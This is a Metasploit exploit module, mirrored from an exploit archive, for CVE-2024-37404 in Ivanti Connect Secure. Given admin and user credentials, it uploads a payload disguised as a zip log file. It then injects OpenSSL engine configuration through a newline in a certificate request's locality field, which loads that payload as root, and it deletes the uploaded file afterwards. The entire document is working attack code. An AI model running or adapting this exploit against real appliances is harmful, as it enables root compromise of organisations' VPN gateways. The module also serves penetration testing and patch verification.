##
# Mirrored from https://sploitus.com/exploit?id=MSF:EXPLOIT-LINUX-HTTP-IVANTI_CONNECT_SECURE_RCE_CVE_2024_37404-
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck

  # Root of the module's error hierarchy; #check, #exploit and
  # #on_new_session rescue this class to catch any of the errors below.
  class IvantiError < StandardError
  end

  # Raised when a login attempt is not accepted by the appliance.
  class IvantiNoAccessError < IvantiError
  end

  # Raised when an expected token, version string or log entry is missing
  # from a response page.
  class IvantiNotFoundError < IvantiError
  end

  # Raised when the server answers with an unexpected status or redirect.
  class IvantiUnexpectedResponseError < IvantiError
  end

  # Raised when a request gets no response at all.
  class IvantiUnknownError < IvantiError
  end

  # Declares the module metadata and registers the datastore options the
  # exploit needs: the web interface base path plus two sets of credentials
  # (one administrative, one regular user).
  #
  # @param info [Hash] metadata passed in by the caller and combined with the
  #   values declared here through update_info
  def initialize(info = {})
    authors = [
      'Richard Warren', # Vulnerability discovery and PoC
      'Christophe De La Fuente', # Metasploit Module
    ]

    references = [
      ['CVE', '2024-37404'],
      ['URL', 'https://attackerkb.com/topics/FI5vcuGwyM/cve-2024-37404'],
      ['URL', 'https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Connect-Secure-and-Policy-Secure-CVE-2024-37404'],
      ['URL', 'https://blog.amberwolf.com/blog/2024/october/cve-2024-37404-ivanti-connect-secure-authenticated-rce-via-openssl-crlf-injection/']
    ]

    notes = {
      'Stability' => [CRASH_SAFE],
      'Reliability' => [REPEATABLE_SESSION],
      'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS, ACCOUNT_LOGOUT]
    }

    # The description literal is kept verbatim, whitespace included.
    metadata =
      {
        'Name' => 'Ivanti Connect Secure Authenticated Remote Code Execution via OpenSSL CRLF Injection',
        'Description' => %q{
          This module exploits a CRLF injection vulnerability in Ivanti Connect
          Secure to achieve remote code execution (CVE-2024-37404). Versions
          prior to 22.7R2.1 are vulnerable. Note that Ivanti Policy Secure
          versions prior to 22.7R1.1 are also vulnerable but this module
          doesn't support this software.

          Valid administrative credentials are required. A non-administrative
          user is also required and can be created using the administrative
          account, if needed.
        },
        'License' => MSF_LICENSE,
        'Author' => authors,
        'References' => references,
        'DisclosureDate' => '2024-10-08',
        'Platform' => 'linux',
        # OpenSSL running on the appliance is an x86 binary, so the payload must be x86 as well.
        'Arch' => ARCH_X86,
        # Administrative access is needed and code execution happens as root.
        'Privileged' => true,
        'Targets' => [['Automatic', {}]],
        'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true },
        'DefaultTarget' => 0,
        'Notes' => notes
      }
    super(update_info(info, metadata))

    module_options = [
      OptString.new('TARGETURI', [true, 'The base path of the Ivanti Connect Secure web interface', '/']),
      OptString.new('ADMIN_USERNAME', [true, 'Administrative username to authenticate with.']),
      OptString.new('ADMIN_PASSWORD', [true, 'Administrator password to authenticate with.']),
      OptString.new('USERNAME', [true, 'Normal user username to authenticate with.']),
      OptString.new('PASSWORD', [true, 'Normal user password to authenticate with.'])
    ]
    register_options(module_options)

    # Set to true by #check after a successful admin login so that #exploit
    # does not authenticate a second time.
    @logged = false
  end

  # Submits the "Continue the session" form shown when the administrator
  # account already has a session open.
  #
  # @param uri [String] location of the confirmation page
  # @return [Object] the response to the confirmation POST
  # @raise [IvantiUnknownError] if either request gets no response
  # @raise [IvantiNotFoundError] if the CSRF token or FormDataStr value is
  #   missing from the confirmation page
  def confirm_login_admin(uri)
    confirm_page = send_request_cgi('method' => 'GET', 'uri' => uri, 'keep_cookies' => 'true')
    raise IvantiUnknownError, "[confirm_login_admin] No response from '#{uri}'" if confirm_page.nil?

    html = confirm_page.get_html_document

    csrf_token = html.xpath('//form/input[@name="xsauth"]/@value').text
    raise IvantiNotFoundError, '[confirm_login_admin] Could not find the CSRF token' if csrf_token.empty?

    form_data_str = html.xpath('//form/input[@id="DSIDFormDataStr"]/@value').text
    raise IvantiNotFoundError, '[confirm_login_admin] Could not find the FormDataStr token' if form_data_str.empty?

    login_uri = normalize_uri(target_uri.path, '/dana-na/auth/url_admin/login.cgi')
    form_fields = {
      'btnContinue' => 'Continue the session',
      'FormDataStr' => form_data_str,
      'xsauth' => csrf_token
    }
    login_res = send_request_cgi(
      'method' => 'POST',
      'uri' => login_uri,
      'keep_cookies' => 'true',
      'vars_post' => form_fields
    )
    raise IvantiUnknownError, "[confirm_login_admin] No response from '#{login_uri}'" if login_res.nil?

    login_res
  end

  # Authenticates against the administrative interface using ADMIN_USERNAME
  # and ADMIN_PASSWORD, confirming the session takeover when the appliance
  # reports that the administrator is already logged in.
  #
  # @return [nil]
  # @raise [IvantiUnknownError] if a request gets no response
  # @raise [IvantiNotFoundError] if the CSRF token is missing from the welcome page
  # @raise [IvantiNoAccessError] if the final response is not a redirect to
  #   the admin landing page
  def login_admin
    print_status(
      "Login to the administrative interface with username '#{datastore['ADMIN_USERNAME']}' and password "\
      "'#{datastore['ADMIN_PASSWORD']}'..."
    )

    uri = normalize_uri(target_uri.path, '/dana-na/auth/url_admin/welcome.cgi')
    res = send_request_cgi('method' => 'GET', 'uri' => uri, 'keep_cookies' => 'true')
    raise IvantiUnknownError, "[login_admin] No response from '#{uri}'" if res.nil?

    csrf_token = res.get_html_document.xpath('//form/input[@id="xsauth_token"]/@value').text
    raise IvantiNotFoundError, '[login_admin] Could not find the CSRF token' if csrf_token.empty?

    uri = normalize_uri(target_uri.path, '/dana-na/auth/url_admin/login.cgi')
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => uri,
      'keep_cookies' => 'true',
      'vars_post' => {
        'tz_offset' => (60 * rand(0..8)).to_s,
        'xsauth_token' => csrf_token,
        'username' => datastore['ADMIN_USERNAME'],
        'password' => datastore['ADMIN_PASSWORD'],
        'realm' => 'Admin Users',
        'btnSubmit' => 'Sign In'
      }
    )
    raise IvantiUnknownError, "[login_admin] No response from '#{uri}'" if res.nil?

    confirm_uri = normalize_uri(target_uri.path, '/dana-na/auth/url_admin/welcome.cgi?p=admin%2Dconfirm')
    if res.code == 302 && res.redirection.to_s == confirm_uri
      print_warning("The admin #{datastore['ADMIN_USERNAME']} is already logged in")
      # The redirect was just matched against a URI that already contains the
      # TARGETURI base path, so it is used as-is. Normalizing it against the
      # base path again would duplicate the prefix whenever TARGETURI is not '/'.
      res = confirm_login_admin(confirm_uri)
    end

    admin_home = normalize_uri(target_uri.path, '/dana-admin/misc/admin.cgi')
    return if res.code == 302 && res.redirection.to_s == admin_home

    raise IvantiNoAccessError, "[login_admin] Login failed (username: #{datastore['ADMIN_USERNAME']}, password: #{datastore['ADMIN_PASSWORD']})"
  end

  # Reads the software version from the admin system information page.
  #
  # @return [Rex::Version] the version built from the dotted version string
  #   found on the page (for example "22.7R2.1")
  # @raise [IvantiUnknownError] if the request gets no response
  # @raise [IvantiNotFoundError] if the version element is missing or its text
  #   does not contain a recognizable version number
  def get_version
    print_status('Getting the version...')

    uri = normalize_uri(target_uri.path, '/dana-admin/sysinfo/sysinfo.cgi')
    res = send_request_cgi('method' => 'GET', 'uri' => uri, 'keep_cookies' => 'true')
    raise IvantiUnknownError, "[get_version] No response from '#{uri}'" if res.nil?

    version_str = res.get_html_document.xpath('//span[@id="DSIDSystemSoftwarePkgVersion"]').text
    raise IvantiNotFoundError, '[get_version] Could not find the version number' if version_str.empty?

    print_good("Found version #{version_str}")

    # Capture every dotted component. Stopping after the first one would turn
    # "22.7R2.1" into "22.7R2", which compares lower than the fixed release and
    # makes a patched appliance look vulnerable.
    version_number = version_str[/\d+(?:\.[\dR]+)+/]
    if version_number.nil?
      raise IvantiNotFoundError, "[get_version] Unexpected version number format: #{version_str}"
    end

    Rex::Version.new(version_number)
  end

  # Logs in as administrator, reads the software version and compares it with
  # the first fixed release (22.7R2.1).
  #
  # @return [Object] CheckCode::Unknown when the admin login fails,
  #   CheckCode::Detected when the version cannot be read, CheckCode::Safe when
  #   the version is not below 22.7R2.1, CheckCode::Appears otherwise
  def check
    begin
      login_admin
    rescue IvantiError => e
      return CheckCode::Unknown("Unable to login to the administrative interface: #{e}")
    else
      # Remember the session so #exploit can skip the login step.
      @logged = true
    end

    version =
      begin
        get_version
      rescue IvantiError => e
        return CheckCode::Detected("Version number not found: #{e}")
      end

    first_fixed = Rex::Version.new('22.7R2.1')
    return CheckCode::Safe("Version number: #{version}") unless version < first_fixed

    CheckCode::Appears
  end

  # Submits the "Continue the session" form shown when the regular user
  # already has a session open.
  #
  # Error messages are tagged with this method's own name (as
  # #confirm_login_admin does) so a failure can be traced to the confirmation
  # step rather than to the initial login request.
  #
  # @param uri [String] location of the confirmation page
  # @return [Object] the response to the confirmation POST
  # @raise [IvantiUnknownError] if either request gets no response
  # @raise [IvantiNotFoundError] if the FormDataStr value is missing from the
  #   confirmation page
  def confirm_login_user(uri)
    res = send_request_cgi('method' => 'GET', 'uri' => uri, 'keep_cookies' => 'true')
    raise IvantiUnknownError, "[confirm_login_user] No response from '#{uri}'" if res.nil?

    form_data_str = res.get_html_document.xpath('//form/input[@id="DSIDFormDataStr"]/@value').text
    raise IvantiNotFoundError, '[confirm_login_user] Could not find the FormDataStr token' if form_data_str.empty?

    uri = normalize_uri(target_uri.path, '/dana-na/auth/url_default/login.cgi')
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => uri,
      'keep_cookies' => 'true',
      'vars_post' => {
        'btnContinue' => 'Continue the session',
        'FormDataStr' => form_data_str
      }
    )
    raise IvantiUnknownError, "[confirm_login_user] No response from '#{uri}'" if res.nil?

    res
  end

  # Authenticates against the user interface using USERNAME and PASSWORD,
  # confirming the session takeover when the appliance reports that the user
  # is already logged in.
  #
  # @return [nil]
  # @raise [IvantiUnknownError] if the request gets no response
  # @raise [IvantiNoAccessError] if the final response is not a redirect to
  #   the user home page
  def login_user
    print_status(
      "Login to the user interface with username '#{datastore['USERNAME']}' and password "\
      "'#{datastore['PASSWORD']}'..."
    )

    uri = normalize_uri(target_uri.path, '/dana-na/auth/url_default/login.cgi')
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => uri,
      'keep_cookies' => 'true',
      'vars_post' => {
        'tz_offset' => '',
        'win11' => '',
        'clientMAC' => '',
        'username' => datastore['USERNAME'],
        'password' => datastore['PASSWORD'],
        'realm' => 'Users',
        'btnSubmit' => 'Sign In'
      }
    )
    raise IvantiUnknownError, "[login_user] No response from '#{uri}'" if res.nil?

    confirm_uri = normalize_uri(target_uri.path, '/dana-na/auth/url_default/welcome.cgi?p=user%2Dconfirm')
    if res.code == 302 && res.redirection.to_s == confirm_uri
      print_warning("User #{datastore['USERNAME']} is already logged in.")
      # The redirect was just matched against a URI that already contains the
      # TARGETURI base path, so it is used as-is. Normalizing it against the
      # base path again would duplicate the prefix whenever TARGETURI is not '/'.
      res = confirm_login_user(confirm_uri)
    end

    # Both conditions must hold, as in #login_admin: a 302 that points anywhere
    # other than the home page is a failed login, not a success.
    user_home = normalize_uri(target_uri.path, '/dana/home/starter0.cgi?check=yes')
    return if res.code == 302 && res.redirection.to_s == user_home

    raise IvantiNoAccessError, "[login_user] Login failed (username: #{datastore['USERNAME']}, password: #{datastore['PASSWORD']})"
  end

  # Uploads the payload, wrapped as a Linux x86 ELF shared object, through the
  # log upload endpoint. The randomly generated client component name is kept
  # in @client_component so the upload can be located afterwards.
  #
  # @return [nil]
  # @raise [IvantiUnknownError] if the request gets no response
  # @raise [IvantiUnexpectedResponseError] if the status code is not 200
  def upload_log
    print_status('Uploading the log file...')

    @client_component = "Log_#{rand_text_numeric(3)}"
    upload_uri = normalize_uri(target_uri.path, "/dana/uploadlog/uploadlog.cgi?client_component=#{@client_component}")

    # The file name claims to be a zip archive; the content is the ELF library.
    file_part = {
      'name' => 'uploaded_file',
      'data' => Msf::Util::EXE.to_linux_x86_elf_dll(framework, payload.encoded),
      'content_type' => 'application/octet-stream',
      'encoding' => 'binary',
      'filename' => 'LULogUpload.zip'
    }
    upload_res = send_request_cgi(
      'method' => 'POST',
      'uri' => upload_uri,
      'keep_cookies' => 'true',
      'vars_form_data' => [file_part]
    )
    raise IvantiUnknownError, "[upload_log] No response from '#{upload_uri}'" if upload_res.nil?
    return if upload_res.code == 200

    raise IvantiUnexpectedResponseError, "[upload_log] Server responded with an unexpected HTTP status code: #{upload_res.code}"
  end

  # Looks up, in the admin list of uploaded logs, the file name of the entry
  # whose row mentions @client_component.
  #
  # @return [String] the file name with surrounding whitespace removed
  # @raise [IvantiUnknownError] if the request gets no response
  # @raise [IvantiNotFoundError] if no matching entry is listed
  def get_log_filename
    print_status('Getting the log file name...')

    logs_uri = normalize_uri(target_uri.path, '/dana-admin/auth/uploadedlogs.cgi')
    logs_page = send_request_cgi('method' => 'GET', 'uri' => logs_uri, 'keep_cookies' => 'true')
    raise IvantiUnknownError, "[get_log_filename] No response from '#{logs_uri}'" if logs_page.nil?

    # Selects the link in a cell preceding the one that contains the component name.
    link_query = "//table[@id='table_uploadedlogs_4']//tr/td[contains(text(), '#{@client_component}')]/preceding-sibling::td/a"
    name = logs_page.get_html_document.xpath(link_query).text.strip
    raise IvantiNotFoundError, '[get_log_filename] Could not find the log filename' if name.empty?

    name
  end

  # Uploads the payload with a regular user session, then switches back to
  # the administrator cookies to look up the name of the stored file.
  #
  # The administrator cookie jar is set aside while the user session is in
  # use and is restored in an `ensure` clause, so a failed user login or
  # upload no longer leaves the module without its administrator cookies.
  #
  # @return [String] the uploaded file name, as returned by #get_log_filename
  # @raise [IvantiError] any error raised by #login_user, #upload_log or
  #   #get_log_filename
  def upload_payload
    print_status('Uploading the payload...')

    admin_cookies = cookie_jar.dup
    cookie_jar.clear
    begin
      login_user
      begin
        upload_log
      ensure
        # The user session exists from here on, so always log it out.
        print_status('Logging the user out...')

        uri = normalize_uri(target_uri.path, '/dana-na/auth/logout.cgi')
        res = send_request_cgi('method' => 'GET', 'uri' => uri)
        print_warning("Unable to logout: no response from '#{uri}'") if res.nil?
      end
    ensure
      self.cookie_jar = admin_cookies
    end
    get_log_filename
  end

  # Requests a new certificate signing request whose locality field carries a
  # newline followed by OpenSSL configuration directives. The injected
  # configuration declares a dynamic engine whose path is the file uploaded
  # earlier (@log_filename under /home/runtime/uploadlog/).
  #
  # @return [Object, nil] whatever send_request_cgi returns for the CSR
  #   request; no response is expected
  # @raise [IvantiUnknownError] if the certificate page request gets no response
  # @raise [IvantiNotFoundError] if the CSRF token is missing from that page
  def trigger_payload
    print_status('Triggering the payload...')

    cert_uri = normalize_uri(target_uri.path, '/dana-admin/cert/admincert.cgi')
    cert_page = send_request_cgi('method' => 'GET', 'uri' => cert_uri, 'keep_cookies' => 'true')
    raise IvantiUnknownError, "[trigger_payload] No response from '#{cert_uri}'" if cert_page.nil?

    csrf_token = cert_page.get_html_document.xpath('//form/input[@id="xsauth_71"]/@value').text
    raise IvantiNotFoundError, '[trigger_payload] Could not find the CSRF token' if csrf_token.empty?

    engine_id = rand_text_alpha_lower(3..5)
    section_name = rand_text_alpha_lower(5..10)
    injected_config = <<~CONF
      [default]
      openssl_conf = openssl_init
      [openssl_init]
      engines = engine_section
      [engine_section]
      #{engine_id} = #{section_name}
      [#{section_name}]
      engine_id = #{engine_id}
      dynamic_path = /home/runtime/uploadlog/#{@log_filename}
      init = 0
    CONF

    csr_request = {
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/dana-admin/cert/admincertnewcsr.cgi'),
      'keep_cookies' => 'true',
      'headers' => { 'Referer' => full_uri('/dana-admin/cert/admincert.cgi') },
      'vars_post' => {
        'xsauth' => csrf_token,
        'commonName' => Faker::Company.department,
        'organizationName' => Faker::Company.name,
        'organizationalUnitName' => Faker::Company.department,
        # The newline ends the locality value; the rest is the injected configuration.
        'localityName' => "#{Faker::Address.city}\n#{injected_config}",
        'stateOrProvinceName' => Faker::Address.state,
        'countryName' => Faker::Address.country_code,
        'emailAddress' => Faker::Internet.email,
        'keytype' => 'RSA',
        'keylength' => '1024',
        'eccurve' => 'prime256v1',
        'random' => rand_text_alphanumeric(5..10),
        'newcsr' => 'yes',
        'certType' => 'device',
        'btnCreateCSR' => 'Create CSR'
      }
    }

    # Expecting no response; the trailing 1 is presumably a short timeout in
    # seconds (confirm against send_request_cgi).
    send_request_cgi(csr_request, 1)
  end

  # Runs the attack: admin login (skipped when #check already did it),
  # payload upload, then payload trigger. Any IvantiError is turned into a
  # fail_with call naming the step that failed.
  #
  # @return [Object] the result of the trigger step
  def exploit
    begin
      login_admin unless @logged
    rescue IvantiError => e
      fail_with(Failure::NoAccess, "Unable to login to the administrative interface: #{e}")
    end

    begin
      # Kept for the trigger step and for cleanup messages.
      @log_filename = upload_payload
    rescue IvantiError => e
      fail_with(Failure::Unknown, "Unable to upload the payload: #{e}")
    end

    begin
      trigger_payload
    rescue IvantiError => e
      fail_with(Failure::Unknown, "Unable to trigger the payload: #{e}")
    end
  end

  # Removes the uploaded file through the admin list of uploaded logs: finds
  # the entry matching @client_component, takes the row number from its link
  # and posts a delete operation for that row.
  #
  # @return [String] the CSRF token read from the page
  # @raise [IvantiUnknownError] if a request gets no response
  # @raise [IvantiNotFoundError] if the CSRF token, the entry or its row
  #   number cannot be found
  # @raise [IvantiUnexpectedResponseError] if the delete request is not
  #   answered with a redirect back to the list
  def delete_log_file
    print_status('Deleting the log file (payload)...')

    logs_uri = normalize_uri(target_uri.path, '/dana-admin/auth/uploadedlogs.cgi')
    logs_page = send_request_cgi('method' => 'GET', 'uri' => logs_uri, 'keep_cookies' => 'true')
    raise IvantiUnknownError, "[delete_log_file] No response from '#{logs_uri}'" if logs_page.nil?

    html = logs_page.get_html_document

    csrf_token = html.xpath('//form/input[@id="xsauth_60"]/@value').text
    raise IvantiNotFoundError, '[delete_log_file] Could not find the CSRF token' if csrf_token.empty?

    entry_link = html.xpath("//table[@id='table_uploadedlogs_4']//tr/td[contains(text(), '#{@client_component}')]/preceding-sibling::td/a")
    raise IvantiNotFoundError, '[delete_log_file] Could not find the log file' if entry_link.empty?

    # The row number is carried by the link as a "row" query parameter.
    href = entry_link.attribute('href')&.value
    log_id = href && href[/&row=(\d+)/, 1]
    raise IvantiNotFoundError, '[delete_log_file] Unable to retrieve the log ID' if log_id.nil?

    delete_uri = normalize_uri(target_uri.path, '/dana-admin/auth/uploadedlogs.cgi')
    delete_res = send_request_cgi(
      'method' => 'POST',
      'uri' => delete_uri,
      'keep_cookies' => 'true',
      'headers' => { 'Referer' => full_uri('/dana-admin/auth/uploadedlogs.cgi') },
      'vars_post' => { 'xsauth' => csrf_token, 'op' => 'del', 'row' => log_id }
    )
    raise IvantiUnknownError, "[delete_log_file] No response from '#{delete_uri}'" if delete_res.nil?

    back_to_list = delete_res.code == 302 &&
                   delete_res.redirection.to_s == normalize_uri(target_uri.path, '/dana-admin/auth/uploadedlogs.cgi')
    unless back_to_list
      raise IvantiUnexpectedResponseError, "[delete_log_file] Unable to delete the log file (status code=#{delete_res.code})"
    end

    csrf_token
  end

  # Cleanup performed once a session is obtained: tries to delete the uploaded
  # file, then logs the administrator out. A failed deletion only produces a
  # warning; the logout is attempted regardless.
  #
  # @param _session [Object] the new session (unused)
  def on_new_session(_session)
    print_status('Cleaning up...')

    csrf_token =
      begin
        delete_log_file
      rescue IvantiError => e
        print_warning(
          "Unable to cleanup properly, the log file ('/home/runtime/uploadlog/#{@log_filename}') "\
          "will need to be deleted manually: #{e}"
        )
        # No token is available when the deletion failed.
        nil
      end

    print_status('Logging the administrator out...')

    logout_uri = normalize_uri(target_uri.path, '/dana-na/auth/logout.cgi')
    logout_res = send_request_cgi('method' => 'GET', 'uri' => logout_uri, 'vars_get' => { 'xsauth' => csrf_token })
    print_warning("Unable to logout: no response from '#{logout_uri}'") if logout_res.nil?
  end

end